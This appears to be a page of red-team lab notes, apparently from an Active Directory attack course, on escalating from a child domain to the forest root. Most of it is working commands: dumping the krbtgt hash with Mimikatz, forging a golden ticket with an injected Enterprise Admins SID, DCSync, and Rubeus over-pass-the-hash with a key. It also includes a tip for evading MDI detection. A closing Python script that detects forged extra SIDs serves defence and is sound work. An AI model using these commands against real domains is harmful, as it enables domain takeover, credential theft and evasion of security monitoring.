# Using KRBTGT Hash

We abuse `sIDHistory` again. First, we dump the credentials on dcorp-dc and obtain the krbtgt hash.

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

{% endcode %}

We can forge the inter-realm TGT for Administrator and inject it.

{% code overflow="wrap" %}

```
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
```

{% endcode %}

In the above command, the Mimikatz option **"/sids"** forcibly sets `sIDHistory` in the `dollarcorp.moneycorp.local` ticket to the Enterprise Admins group SID (RID 519), which is the forest-wide Enterprise Admins group.

We can now access mcorp:

{% code overflow="wrap" %}

```
winrs -r:mcorp-dc.moneycorp.local cmd
```

{% endcode %}

* On any machine of the current domain

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
```

{% endcode %}

* We can now run commands on the remote machine

{% code overflow="wrap" %}

```
ls \\mcorp-dc.moneycorp.local\c$
```

{% endcode %}

{% code overflow="wrap" %}

```
gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
```

{% endcode %}

* If you can't get a shell on the remote system with `winrs` and you see the error shown in the screenshot below, here is what to do to get a shell 🤟 (DCSync)

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FzDg9rOtAqmJAKPpMUAXh%2Fimage.png?alt=media&#x26;token=4dca737e-7504-4cc2-902e-14c86816b48f" alt=""><figcaption></figcaption></figure>

1. Run the `dcsync` attack against the forest root for the krbtgt hash (the command below targets `mcorp\administrator`):

{% code overflow="wrap" %}

```
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit"
```

{% endcode %}

2. Now use over-pass-the-hash to start a process as the administrator of `moneycorp.local`, the domain we want the request to be sent to:

{% code overflow="wrap" %}

```
C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

{% endcode %}

* You should now have a new process running as the domain administrator of `mcorp-dc`; run the `winrs` command again from it and you should have shell access:

{% code overflow="wrap" %}

```
winrs -r:mcorp-dc cmd
```

{% endcode %}

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FzejifD6I9Vd72YkBPVoE%2Fimage.png?alt=media&#x26;token=2410eff5-ef29-47a3-b523-47611f6c190c" alt=""><figcaption></figcaption></figure>

* Avoid suspicious logs by using the Domain Controllers group (bypass MDI detection)\
  Note: /user:dcorp-dc$ used to work earlier (till April 2023) but now we need to use /user:Administrator

{% code overflow="wrap" %}

```
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"
```

{% endcode %}

{% code overflow="wrap" %}

```
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
```

{% endcode %}

***Domain SIDs:***

* S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers
* S-1-5-9 - Enterprise Domain Controllers
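
The `/sids` option explained above and the SID list here rest on the same structure: a domain SID (`S-1-5-21-x-y-z`) followed by a RID, where a handful of RIDs are fixed by Windows (519 Enterprise Admins, 516 Domain Controllers) and `S-1-5-9` is a non-domain well-known SID. A ticket issued by the child domain whose extra SIDs carry a privileged RID from the parent domain is exactly what a forged ticket built with `/sids` looks like to a reviewer. The Python below is an added example, not code from this playbook: it parses SIDs, flags foreign privileged SIDs and DC-only SIDs on a non-machine principal, and models what a quarantined (SID-filtered) trust would strip. The domain SIDs and the sample extra-SID list are constructed; only the RIDs and `S-1-5-9` are real well-known values. Intra-forest child-to-parent trusts do not apply SID filtering by default, which is why the technique on this page works, so the check is worth running on ticket/PAC data rather than relying on the trust.

```python
"""Review the extra SIDs (sIDHistory / ExtraSids) carried in a Kerberos ticket.

Added example for this playbook page (not the playbook's own code). Domain SIDs and
the sample SID list are constructed; RIDs and S-1-5-9 are Windows well-known values.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

SID_RE = re.compile(r"^S-1-\d+(?:-\d+)+$")
DOMAIN_PREFIX = "S-1-5-21-"

# Well-known RIDs fixed by Windows; seeing one from a *foreign* domain is a red flag.
PRIVILEGED_RIDS: Dict[int, str] = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}

# Well-known non-domain SIDs that make a principal look like a domain controller.
WELL_KNOWN_SIDS: Dict[str, str] = {"S-1-5-9": "Enterprise Domain Controllers"}

# Constructed lab values: child domain (dollarcorp) and forest root (moneycorp).
CHILD_SID = "S-1-5-21-1000000001-1000000002-1000000003"
PARENT_SID = "S-1-5-21-2000000001-2000000002-2000000003"

# Constructed extra-SID list resembling a ticket forged with /sids and /groups:516.
SAMPLE_EXTRA_SIDS: List[str] = [
    PARENT_SID + "-519",   # parent Enterprise Admins
    PARENT_SID + "-516",   # parent Domain Controllers
    "S-1-5-9",             # Enterprise Domain Controllers
    CHILD_SID + "-1105",   # ordinary group in the issuing domain
    PARENT_SID + "-1200",  # ordinary parent-domain principal (e.g. a migrated user)
]


@dataclass(frozen=True)
class SidInfo:
    sid: str
    domain: Optional[str]  # S-1-5-21-x-y-z part; None for non-domain SIDs
    rid: Optional[int]     # last sub-authority when the SID names a principal


def parse_sid(sid: str) -> SidInfo:
    """Split a SID string into its domain part and RID; raise on malformed input."""
    if not SID_RE.match(sid):
        raise ValueError(f"not a SID string: {sid!r}")
    if not sid.startswith(DOMAIN_PREFIX):
        return SidInfo(sid, None, None)
    # S-1-5-21-a-b-c is a bare domain SID (7 dash-separated parts); one more part is the RID.
    if len(sid.split("-")) == 7:
        return SidInfo(sid, sid, None)
    domain, _, rid = sid.rpartition("-")
    return SidInfo(sid, domain, int(rid))


def review_extra_sids(user: str, issuing_domain_sid: str, extra_sids: Iterable[str]) -> List[dict]:
    """Classify each extra SID relative to the domain that issued the ticket."""
    is_machine = user.endswith("$")
    findings = []
    for sid in extra_sids:
        info = parse_sid(sid)
        label = PRIVILEGED_RIDS.get(info.rid) if info.rid is not None else WELL_KNOWN_SIDS.get(sid)
        foreign = info.domain is not None and info.domain != issuing_domain_sid
        # A privileged group from another domain, or a DC-only SID on a non-machine
        # account, is the signature of a ticket built with /sids or /groups:516.
        suspicious = (foreign and label is not None) or (sid in WELL_KNOWN_SIDS and not is_machine)
        findings.append({"sid": sid, "label": label, "foreign": foreign, "suspicious": suspicious})
    return findings


def filter_sids(sids: Iterable[str], allowed_domain_sids: Set[str]) -> List[str]:
    """Simplified model of a quarantined (SID-filtered) trust: keep only SIDs whose
    domain part is one of the allowed domains. Intra-forest child-to-parent trusts
    do not apply this by default, so the parent-domain SIDs above survive there."""
    return [s for s in sids if parse_sid(s).domain in allowed_domain_sids]


if __name__ == "__main__":
    for f in review_extra_sids("Administrator", CHILD_SID, SAMPLE_EXTRA_SIDS):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['sid']:<50} {f['label'] or '-':<30} foreign={f['foreign']} {flag}")
    print("kept by a filtered trust:", filter_sids(SAMPLE_EXTRA_SIDS, {CHILD_SID}))
```

Run against real data by feeding `review_extra_sids` the ExtraSids from a decoded PAC or the SID History of a logon token, with the issuing domain's SID as the reference; the machine-account exception keeps legitimate DC tickets (which do carry `S-1-5-9`) out of the findings while still flagging a user ticket that claims it.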

